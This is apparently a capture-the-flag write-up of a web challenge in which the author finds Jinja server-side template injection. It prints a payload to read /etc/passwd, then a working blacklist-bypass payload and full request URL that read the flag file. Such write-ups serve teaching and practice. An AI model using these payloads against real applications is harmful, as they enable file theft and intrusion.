Rating: 4.0

By looking into the website and parameter we can think it could be some injection.
My first thought was to try SSTI(Server side template injection)
http://web.euristica.in/hard_to_hack/index?data={{7\*7}}
Server returned 49 !!
Also,as {{'7'\*7}} works, we can conclude it is Jinja template.

So, I tried injecting payload to read /etc/passwd and check if it works.
**payload**: `{{ ''.class.mro[2].subclasses()[40]('/etc/passwd').read() }}` - FAILS

After trying different characters , i figured out **class,mro,subclasses,_** were all **blacklisted**.

To bypass this, I came up with the following payload:

**Final Working Payload** `{{(((((request|attr(request.args.f|format(request.args.a,request.args.a,request.args.a,request.args.a)))|attr(request.args.m|format(request.args.a,request.args.a,request.args.a,request.args.a)))[8])|attr(request.args.k|format(request.args.a,request.args.a,request.args.a,request.args.a))())[40])(%27flag%27).read()}}&f=%s%sclass%s%s&a=_&m=%s%smro%s%s&k=%s%ssubclasses%s%s`
.

**Now make a request to read the flag**

`http://web.euristica.in/hard_to_hack/index?data={{(((((request|attr(request.args.f|format(request.args.a,request.args.a,request.args.a,request.args.a)))|attr(request.args.m|format(request.args.a,request.args.a,request.args.a,request.args.a)))[8])|attr(request.args.k|format(request.args.a,request.args.a,request.args.a,request.args.a))())[40])(%27flag%27).read()}}&f=%s%sclass%s%s&a=_&m=%s%smro%s%s&k=%s%ssubclasses%s%s`

**FLAG**: `flag{BlackListing_N3Ver_H3lp3d_An40ne}`